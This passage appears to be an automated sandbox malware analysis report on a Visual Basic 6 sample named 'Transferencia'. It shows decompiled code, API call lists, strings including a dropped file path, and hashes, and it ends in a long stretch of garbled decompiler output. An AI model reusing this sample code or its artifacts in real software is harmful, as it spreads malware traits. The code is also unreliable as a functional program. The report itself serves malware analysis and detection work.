							_v368 = 0x41831c;
						}
						_v204 =  *_v368;
						if( *0x418010 != 0) {
							_v372 = 0x418010;
						} else {
							_push(0x418010);
							_push(0x414948);
							L004012FE();
							_v372 = 0x418010;
						}
						_t643 =  &_v100;
						L004012E0();
						_v196 = _t643;
						_t647 =  *((intOrPtr*)( *_v196 + 0x198))(_v196,  &_v88, _t643,  *((intOrPtr*)( *((intOrPtr*)( *_v372)) + 0x38c))( *_v372));
						asm("fclex");
						_v200 = _t647;
						if(_v200 >= 0) {
							_v376 = _v376 & 0x00000000;
						} else {
							_push(0x198);
							_push(0x4147bc);
							_push(_v196);
							_push(_v200);
							L00401304();
							_v376 = _t647;
						}
						L004012AA();
						_t648 =  &_v104;
						L004012E0();
						_t651 =  *((intOrPtr*)( *_v204 + 0x40))(_v204, _t648, _t648, _t647, _v68, 0x4147cc, _v88);
						asm("fclex");
						_v208 = _t651;
						if(_v208 >= 0) {
							_v380 = _v380 & 0x00000000;
						} else {
							_push(0x40);
							_push(0x414710);
							_push(_v204);
							_push(_v208);
							L00401304();
							_v380 = _t651;
						}
						_t679 =  &_v88;
						L004012EC();
						_push( &_v104);
						_push( &_v100);
						_push(2);
						L004012DA();
						_t719 = _t719 + 0xc;
					}
					_v8 = 0x1b;
					_v192 = 0x781b26e0;
					_v188 = 0x5af6;
					_v132 = 0x452f97;
					_v140 = 3;
					_t742 =  *0x40117c;
					_v324 = _t742;
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t595 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x10,  &_v192, _t679);
					_v196 = _t595;
					if(_v196 >= 0) {
						_v384 = _v384 & 0x00000000;
					} else {
						_push(0x700);
						_push(0x4141e0);
						_push(_a4);
						_push(_v196);
						L00401304();
						_v384 = _t595;
					}
					_v8 = 0x1c;
					if( *0x418010 != 0) {
						_v388 = 0x418010;
					} else {
						_push(0x418010);
						_push(0x414948);
						L004012FE();
						_v388 = 0x418010;
					}
					_t599 =  &_v100;
					L004012E0();
					_v196 = _t599;
					_v132 = _v132 & 0x00000000;
					_v140 = 2;
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t603 =  *((intOrPtr*)( *_v196 + 0x200))(_v196, 0x10, _t599,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x384))( *_v388));
					asm("fclex");
					_v200 = _t603;
					if(_v200 >= 0) {
						_v392 = _v392 & 0x00000000;
					} else {
						_push(0x200);
						_push(0x414780);
						_push(_v196);
						_push(_v200);
						L00401304();
						_v392 = _t603;
					}
					L004012E6();
					_v8 = 0x1d;
					 *((intOrPtr*)( *_a4 + 0x70c))(_a4);
					_v8 = 0x1e;
					if( *0x418010 != 0) {
						_v396 = 0x418010;
					} else {
						_push(0x418010);
						_push(0x414948);
						L004012FE();
						_v396 = 0x418010;
					}
					_t610 =  &_v100;
					L004012E0();
					_v196 = _t610;
					_t614 =  *((intOrPtr*)( *_v196 + 0xd0))(_v196,  &_v176, _t610,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x310))( *_v396));
					asm("fclex");
					_v200 = _t614;
					if(_v200 >= 0) {
						_v400 = _v400 & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x4147dc);
						_push(_v196);
						_push(_v200);
						L00401304();
						_v400 = _t614;
					}
					if( *0x418010 != 0) {
						_v404 = 0x418010;
					} else {
						_push(0x418010);
						_push(0x414948);
						L004012FE();
						_v404 = 0x418010;
					}
					_t669 =  *((intOrPtr*)( *_v404));
					_t618 =  &_v104;
					L004012E0();
					_v204 = _t618;
					_v164 = 0x80020004;
					_v172 = 0xa;
					_v148 = 0x80020004;
					_v156 = 0xa;
					_v132 = 0x80020004;
					_v140 = 0xa;
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v408 = _v176;
					asm("fild dword [ebp-0x194]");
					_v412 = _t742;
					_v388 = _v412;
					_t625 =  *((intOrPtr*)( *_v204 + 0x130))(_v204, _t669, 0x10, 0x10, 0x10, _t618,  *((intOrPtr*)(_t669 + 0x334))( *_v404));
					asm("fclex");
					_v208 = _t625;
					if(_v208 >= 0) {
						_v416 = _v416 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x4147ec);
						_push(_v204);
						_push(_v208);
						L00401304();
						_v416 = _t625;
					}
					_push( &_v104);
					_push( &_v100);
					_push(2);
					L004012DA();
					_t718 = _t719 + 0xc;
					_v8 = 0x1f;
					_push( &_v244);
					_push( &_v228);
					_t630 =  &_v52;
					_push(_t630);
					L004012A4();
					_v272 = _t630;
				}
				_v8 = 0x20;
				_v12 = 0xffd4eb26;
				_t461 =  &_v12;
				 *_t461 = _v12 + 0x6c1c73;
				_t631 = _v12();
				if( *_t461 >= 0) {
					asm("invalid");
					_push(_t631);
					_push(2);
					L00401298();
					L004012C2();
					L004012E6();
					return _t631;
				} else {
					_push( &_v92);
					_push( &_v88);
					_push(3);
					L0040129E();
					_push( &_v108);
					_push( &_v104);
					_t637 =  &_v100;
					_push(_t637);
					_push(3);
					L004012DA();
					L004012C2();
					return _t637;
				}
			}

0x00416167
0x00416176
0x00416182
0x0041618a
0x0041618d
0x0041619a
0x004161a3
0x004161a6
0x004161b5
0x004161b8
0x004161bf
0x004161c8
0x004161cd
0x004161dc
0x004161e2
0x004161e4
0x004161f1
0x00416213
0x004161f3
0x004161f3
0x004161f8
0x004161fd
0x00416200
0x00416206
0x0041620b
0x0041620b
0x0041621a
0x00416228
0x00416245
0x0041622a
0x0041622a
0x0041622f
0x00416234
0x00416239
0x00416239
0x00416257
0x0041626f
0x00416272
0x00416274
0x00416281
0x004162a3
0x00416283
0x00416283
0x00416285
0x0041628a
0x00416290
0x00416296
0x0041629b
0x0041629b
0x004162ad
0x004162c8
0x004162ce
0x004162d0
0x004162dd
0x00416302
0x004162df
0x004162df
0x004162e4
0x004162e9
0x004162ef
0x004162f5
0x004162fa
0x004162fa
0x0041631c
0x00416320
0x0041632c
0x00416331
0x00416337
0x00416342
0x00416348
0x00416350
0x00416355
0x0041635c
0x00416372
0x00416375
0x00416377
0x00416384
0x004163a3
0x00416386
0x00416386
0x00416388
0x0041638d
0x00416390
0x00416396
0x0041639b
0x0041639b
0x004163aa
0x004163b0
0x004163b5
0x004163ba
0x004163c1
0x004163c6
0x004163cb
0x004163d2
0x004163d5
0x004163d7
0x004163dc
0x004163e1
0x004163e8
0x004163ea
0x004163ef
0x004163f5
0x004163fa
0x00416401
0x00416406
0x0041640b
0x00416419
0x00416436
0x0041641b
0x0041641b
0x00416420
0x00416425
0x0041642a
0x0041642a
0x00416448
0x00416460
0x00416463
0x00416465
0x00416472
0x00416494
0x00416474
0x00416474
0x00416476
0x0041647b
0x00416481
0x00416487
0x0041648c
0x0041648c
0x0041649e
0x004164a4
0x004164ab
0x004164bc
0x004164c9
0x004164ca
0x004164cb
0x004164cc
0x004164db
0x004164de
0x004164e0
0x004164ed
0x0041650f
0x004164ef
0x004164ef
0x004164f1
0x004164f6
0x004164fc
0x00416502
0x00416507
0x00416507
0x00416519
0x0041651f
0x00416529
0x0041652d
0x0041653b
0x00416541
0x00416543
0x00416550
0x00416572
0x00416552
0x00416552
0x00416557
0x0041655c
0x0041655f
0x00416565
0x0041656a
0x0041656a
0x0041657c
0x00416580
0x00416581
0x00416583
0x00416588
0x0041658b
0x00416599
0x004165b6
0x0041659b
0x0041659b
0x004165a0
0x004165a5
0x004165aa
0x004165aa
0x004165da
0x004165de
0x004165e3
0x004165f7
0x004165fd
0x004165ff
0x0041660c
0x00416631
0x0041660e
0x0041660e
0x00416613
0x00416618
0x0041661e
0x00416624
0x00416629
0x00416629
0x0041663b
0x00416640
0x00416647
0x0041664e
0x00416658
0x00416662
0x0041666f
0x0041667c
0x0041667d
0x0041667e
0x0041667f
0x0041668f
0x00416695
0x0041669c
0x004166a1
0x004166a4
0x004166ba
0x004166c0
0x004166cd
0x004166ef
0x004166cf
0x004166cf
0x004166d4
0x004166d9
0x004166dc
0x004166e2
0x004166e7
0x004166e7
0x004166fc
0x00416705
0x00416708
0x0041670f
0x00416711
0x00416713
0x0041671b
0x0041671c
0x00416721
0x00416724
0x00416725
0x00416735
0x0041673c
0x0041673f
0x00416744
0x0041674d
0x0041674f
0x0041675c
0x0041676a
0x0041676d
0x0041676f
0x0041677c
0x0041679b
0x0041677e
0x0041677e
0x00416780
0x00416785
0x00416788
0x0041678e
0x00416793
0x00416793
0x0041677c
0x004167a2
0x004167a9
0x004167b0
0x004167ba
0x004167c4
0x004167ce
0x004167d5
0x004167e5
0x004167ec
0x004167f3
0x004167fa
0x00416801
0x00416802
0x00416805
0x00416806
0x0041680b
0x00417089
0x00416816
0x00416824
0x00416841
0x00416826
0x00416826
0x0041682b
0x00416830
0x00416835
0x00416835
0x00416865
0x00416869
0x0041686e
0x00416886
0x00416889
0x0041688b
0x00416898
0x004168ba
0x0041689a
0x0041689a
0x0041689c
0x004168a1
0x004168a7
0x004168ad
0x004168b2
0x004168b2
0x004168c8
0x004168e5
0x004168ca
0x004168ca
0x004168cf
0x004168d4
0x004168d9
0x004168d9
0x00416909
0x0041690d
0x00416912
0x0041692a
0x00416930
0x00416932
0x0041693f
0x00416964
0x00416941
0x00416941
0x00416946
0x0041694b
0x00416951
0x00416957
0x0041695c
0x0041695c
0x0041696e
0x00416974
0x0041697e
0x00416981
0x00416989
0x0041698f
0x00416999
0x0041699c
0x004169a3
0x004169aa
0x004169c7
0x004169d1
0x004169de
0x004169df
0x004169e0
0x004169e1
0x004169ea
0x004169f0
0x004169fd
0x00416a1f
0x004169ff
0x004169ff
0x00416a04
0x00416a09
0x00416a0c
0x00416a12
0x00416a17
0x00416a17
0x00416a2d
0x00416a34
0x00416a3c
0x00416a40
0x00416a41
0x00416a43
0x00416a48
0x00416a4e
0x00416a53
0x00416a61
0x00416a7e
0x00416a63
0x00416a63
0x00416a68
0x00416a6d
0x00416a72
0x00416a72
0x00416a90
0x00416aa8
0x00416aab
0x00416aad
0x00416aba
0x00416adc
0x00416abc
0x00416abc
0x00416abe
0x00416ac3
0x00416ac9
0x00416acf
0x00416ad4
0x00416ad4
0x00416ae6
0x00416b01
0x00416b07
0x00416b09
0x00416b16
0x00416b3b
0x00416b18
0x00416b18
0x00416b1d
0x00416b22
0x00416b28
0x00416b2e
0x00416b33
0x00416b33
0x00416b50
0x00416b57
0x00416b5a
0x00416b68
0x00416b6e
0x00416b75
0x00416b83
0x00416ba0
0x00416b85
0x00416b85
0x00416b8a
0x00416b8f
0x00416b94
0x00416b94
0x00416bb2
0x00416bbf
0x00416bdc
0x00416bc1
0x00416bc1
0x00416bc6
0x00416bcb
0x00416bd0
0x00416bd0
0x00416c00
0x00416c04
0x00416c09
0x00416c21
0x00416c27
0x00416c29
0x00416c36
0x00416c5b
0x00416c38
0x00416c38
0x00416c3d
0x00416c42
0x00416c48
0x00416c4e
0x00416c53
0x00416c53
0x00416c6d
0x00416c73
0x00416c77
0x00416c8b
0x00416c8e
0x00416c90
0x00416c9d
0x00416cbf
0x00416c9f
0x00416c9f
0x00416ca1
0x00416ca6
0x00416cac
0x00416cb2
0x00416cb7
0x00416cb7
0x00416cc6
0x00416cc9
0x00416cd1
0x00416cd5
0x00416cd6
0x00416cd8
0x00416cdd
0x00416cdd
0x00416ce0
0x00416ce7
0x00416cf1
0x00416cfb
0x00416d02
0x00416d0c
0x00416d13
0x00416d20
0x00416d2d
0x00416d2e
0x00416d2f
0x00416d30
0x00416d39
0x00416d3f
0x00416d4c
0x00416d6e
0x00416d4e
0x00416d4e
0x00416d53
0x00416d58
0x00416d5b
0x00416d61
0x00416d66
0x00416d66
0x00416d75
0x00416d83
0x00416da0
0x00416d85
0x00416d85
0x00416d8a
0x00416d8f
0x00416d94
0x00416d94
0x00416dc4
0x00416dc8
0x00416dcd
0x00416dd3
0x00416dd7
0x00416de4
0x00416df1
0x00416df2
0x00416df3
0x00416df4
0x00416e03
0x00416e09
0x00416e0b
0x00416e18
0x00416e3d
0x00416e1a
0x00416e1a
0x00416e1f
0x00416e24
0x00416e2a
0x00416e30
0x00416e35
0x00416e35
0x00416e47
0x00416e4c
0x00416e5b
0x00416e61
0x00416e6f
0x00416e8c
0x00416e71
0x00416e71
0x00416e76
0x00416e7b
0x00416e80
0x00416e80
0x00416eb0
0x00416eb4
0x00416eb9
0x00416ed4
0x00416eda
0x00416edc
0x00416ee9
0x00416f0e
0x00416eeb
0x00416eeb
0x00416ef0
0x00416ef5
0x00416efb
0x00416f01
0x00416f06
0x00416f06
0x00416f1c
0x00416f39
0x00416f1e
0x00416f1e
0x00416f23
0x00416f28
0x00416f2d
0x00416f2d
0x00416f53
0x00416f5d
0x00416f61
0x00416f66
0x00416f6c
0x00416f76
0x00416f80
0x00416f8a
0x00416f94
0x00416f9b
0x00416fa8
0x00416fb5
0x00416fb6
0x00416fb7
0x00416fb8
0x00416fbc
0x00416fc9
0x00416fca
0x00416fcb
0x00416fcc
0x00416fd0
0x00416fdd
0x00416fde
0x00416fdf
0x00416fe0
0x00416fe8
0x00416fee
0x00416ff4
0x00417001
0x00417012
0x00417018
0x0041701a
0x00417027
0x0041704c
0x00417029
0x00417029
0x0041702e
0x00417033
0x00417039
0x0041703f
0x00417044
0x00417044
0x00417056
0x0041705a
0x0041705b
0x0041705d
0x00417062
0x00417065
0x00417072
0x00417079
0x0041707a
0x0041707d
0x0041707e
0x00417083
0x00417083
0x00417096
0x0041709d
0x004170a4
0x004170a4
0x004170ab
0x004170ae
0x004170f3
0x004170f5
0x004170f6
0x004170f8
0x00417103
0x0041710b
0x00417110
0x004170b0
0x004170ba
0x004170be
0x004170bf
0x004170c1
0x004170cc
0x004170d0
0x004170d1
0x004170d4
0x004170d5
0x004170d7
0x004170e2
0x004170e7
0x004170e7

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 00416182
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004011F6), ref: 004161C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004141B0,000002B4), ref: 00416206
__vbaNew2.MSVBVM60(00414720,0041831C), ref: 00416234
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00414710,00000014), ref: 00416296
__vbaHresultCheckObj.MSVBVM60(00000000,?,00414730,00000100), ref: 004162F5
__vbaStrToAnsi.MSVBVM60(?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 00416320
__vbaSetSystemError.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 00416337
__vbaFreeStr.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 00416348
__vbaFreeObj.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 00416350
__vbaHresultCheckObj.MSVBVM60(00000000,?,004141B0,00000058), ref: 00416396
__vbaSetSystemError.MSVBVM60(?), ref: 004163B5
__vbaSetSystemError.MSVBVM60(?), ref: 004163C6
__vbaSetSystemError.MSVBVM60(00000002,?,?), ref: 004163DC
__vbaSetSystemError.MSVBVM60(00000002,00000002,?,?), ref: 004163F5
__vbaSetSystemError.MSVBVM60(00000002,00000002,?,?), ref: 00416406
__vbaNew2.MSVBVM60(00414720,0041831C,00000002,00000002,?,?), ref: 00416425
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00414710,0000001C), ref: 00416487
__vbaChkstk.MSVBVM60(?), ref: 004164BC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00414770,00000054), ref: 00416502
__vbaObjSet.MSVBVM60(?,?), ref: 0041652D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004141B0,00000154), ref: 00416565
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00416583
__vbaNew2.MSVBVM60(00414948,00418010,?,?,004011F6), ref: 004165A5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004165DE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00414780,000001F8), ref: 00416624
__vbaFreeObj.MSVBVM60(00000000,?,00414780,000001F8), ref: 0041663B
__vbaChkstk.MSVBVM60(00000000,?,00414780,000001F8), ref: 0041666F
#615.MSVBVM60 ref: 0041669C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004141E0,000006F8), ref: 004166E2
#538.MSVBVM60(?,000007DB,0000000B,0000000B), ref: 0041671C
#557.MSVBVM60(?,?,000007DB,0000000B,0000000B), ref: 00416725
__vbaFreeVar.MSVBVM60(?,?,000007DB,0000000B,0000000B), ref: 0041673F
__vbaFpI4.MSVBVM60(?,?,000007DB,0000000B,0000000B), ref: 0041675C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004141B0,00000064), ref: 0041678E
__vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002,?,?,000007DB,0000000B,0000000B), ref: 00416806
__vbaNew2.MSVBVM60(00414948,00418010,?,?,?,00000002,00000003,00000002,?,?,000007DB,0000000B,0000000B), ref: 00416830
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416869
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004145E8,00000048), ref: 004168AD
__vbaNew2.MSVBVM60(00414948,00418010), ref: 004168D4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041690D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004147AC,000000C8), ref: 00416957
__vbaStrMove.MSVBVM60(00000000,?,004147AC,000000C8), ref: 00416981
__vbaChkstk.MSVBVM60(00000008,?,?,?,?), ref: 004169D1
__vbaFreeStrList.MSVBVM60(00000003,?,?), ref: 004170C1
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,?,?), ref: 004170D7
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?), ref: 004170E2

Strings

c:\windows\logow.sys, xrefs: 00416317
greenfield, xrefs: 00416647
1y;, xrefs: 004169A3
, xrefs: 00417096

Memory Dump Source

Source File: 00000000.00000002.902848355.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.902835212.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902866218.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.902871256.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd

Similarity

API ID: __vba$CheckHresult$Free$Error$System$New2$Chkstk$List$#538#557#615AnsiInitMove
String ID: $1y;$c:\windows\logow.sys$greenfield
API String ID: 3170813935-685939622
Opcode ID: 4a2cda3e415bdb016dd9f16a8029b0c47a9ddd40040d526cfe8643457f84ed3a
Instruction ID: 40fa5e21e30815420802455b1e08bd9787e7b2c425080e49f72cd1173220fb09
Opcode Fuzzy Hash: 4a2cda3e415bdb016dd9f16a8029b0c47a9ddd40040d526cfe8643457f84ed3a
Instruction Fuzzy Hash: 8C92D570901228EFEB21DF94CC45BDDBBB5BB08304F1041EAE509BB2A1DB795A84DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00417505, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00417505(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v32;
				char _v40;
				char* _t11;
				intOrPtr _t22;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t22;
				_push(0x28);
				L004011F0();
				_v12 = _t22;
				_v8 = 0x4011d0;
				_v32 = 1;
				_v40 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t11 =  &_v40;
				_push(_t11); // executed
				L00401286(); // executed
				L004012B0();
				L004012C2();
				_push(0x41757c);
				L004012EC();
				return _t11;
			}

0x0041750a
0x00417515
0x00417516
0x0041751d
0x00417520
0x00417528
0x0041752b
0x00417532
0x00417539
0x00417540
0x00417542
0x00417544
0x00417546
0x00417548
0x0041754b
0x0041754c
0x00417556
0x0041755e
0x00417563
0x00417576
0x0041757b

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 00417520
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,004011F6), ref: 0041754C
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,004011F6), ref: 00417556
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,004011F6), ref: 0041755E
__vbaFreeStr.MSVBVM60(0041757C,00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,004011F6), ref: 00417576

Memory Dump Source

Source File: 00000000.00000002.902848355.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.902835212.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902866218.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.902871256.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd

Similarity

API ID: __vba$Free$#703ChkstkMove
String ID:
API String ID: 469383263-0
Opcode ID: 0bcffce797d9cb15b79d6f0db3f4e14ef7328ac327dcc04380491e599b44ce6f
Instruction ID: 120789474c7b99996ad5a8fadc1ffc24220b9e974042e878f46b6a063fee0454
Opcode Fuzzy Hash: 0bcffce797d9cb15b79d6f0db3f4e14ef7328ac327dcc04380491e599b44ce6f
Instruction Fuzzy Hash: FEF04470804108BACB04DB95CD46FDEB6B9AB09764F70436EB121761E1DA781D048669

Uniqueness

Uniqueness Score: -1.00%

Function 00401328, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			_entry_() {
				signed char _t39;
				signed char _t40;
				intOrPtr* _t43;
				signed char _t45;
				signed char _t46;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed char _t53;
				signed char _t54;
				void* _t55;
				void* _t56;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr* _t60;
				signed int _t61;
				signed int _t63;
				signed char _t64;
				signed int _t66;
				void* _t69;
				intOrPtr* _t70;
				void* _t73;
				void* _t74;
				signed int _t75;
				intOrPtr* _t76;
				void* _t80;
				void* _t89;
				void* _t90;
				void* _t92;
				intOrPtr _t99;

				_push("VB5!6&*"); // executed
				L00401322(); // executed
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				do {
					 *_t39 =  *_t39 ^ _t39;
					 *_t39 =  *_t39 + _t39;
					 *_t39 =  *_t39 + _t39;
					 *_t39 =  *_t39 + _t39;
					 *_t39 =  *_t39 + _t39;
				} while ( *_t39 < 0);
				asm("fisub dword [edi]");
				_t55 = 0x3f;
				asm("sti");
				_t40 = _t39 + 1;
				 *(_t69 - 0x6f) =  *(_t69 - 0x6f) | 0x17349181;
				_push(_t73);
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				_t60 = _t59 + 1;
				 *((intOrPtr*)(_t73 + 0x53018250)) =  *((intOrPtr*)(_t73 + 0x53018250)) + _t40;
				do {
					_push(_t55);
					_push(0x7372656f);
					asm("aaa");
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					_t56 = _t55 + _t55;
					_t89 = _t89 - 1;
					 *_t40 =  *_t40 ^ _t40;
					_t55 = _t56 - _t64;
					asm("aam 0x67");
					_t73 = _t73 - 1;
					 *((intOrPtr*)(_t80 - 0x6a)) =  *((intOrPtr*)(_t80 - 0x6a)) + 0xde15a246;
					 *_t64 =  *_t64 + 1;
					_t7 = _t55 - 0x5d2637b1;
					 *_t7 =  *(_t55 - 0x5d2637b1) << 0x45;
					_push(_t60);
				} while ( *_t7 < 0);
				asm("sahf");
				_pop(ds);
				asm("in al, dx");
				_t57 = _t55 - 1;
				_t74 = _t73 + 1;
				_push(_t89);
				asm("invalid");
				asm("cdq");
				asm("iretw");
				asm("adc [edi+0xaa000c], esi");
				asm("pushad");
				asm("rcl dword [ebx], cl");
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 + _t40;
				_t90 = _t89 + 1;
				 *_t40 =  *_t40 + _t40;
				 *_t60 =  *_t60 + _t60;
				 *((intOrPtr*)(_t60 + 0x53 + _t40 * 2)) =  *((intOrPtr*)(_t60 + 0x53 + _t40 * 2)) + _t60;
				_push(_t90);
				_push(_t40);
				_t61 = _t60 + 1;
				_t92 = _t90;
				 *0x62000701 =  *0x62000701 + _t61;
				_t99 =  *0x62000701;
				asm("insb");
				if(_t99 < 0) {
					L9:
					 *_t61 =  *_t61 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *((intOrPtr*)(_t40 + 0x25)) =  *((intOrPtr*)(_t40 + 0x25)) + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
